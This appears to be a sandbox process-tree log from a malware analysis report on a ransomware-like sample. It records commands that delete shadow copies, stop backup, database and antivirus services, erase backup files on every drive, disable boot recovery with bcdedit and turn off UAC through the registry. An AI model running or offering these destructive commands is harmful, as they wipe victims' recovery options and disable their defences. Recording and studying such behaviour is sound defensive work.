C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"3⤵
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"5⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"3⤵
-
C:\Windows\system32\net.exenet stop "masvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"3⤵
-
C:\Windows\system32\net.exenet stop "MBAMService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"3⤵
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"5⤵
-
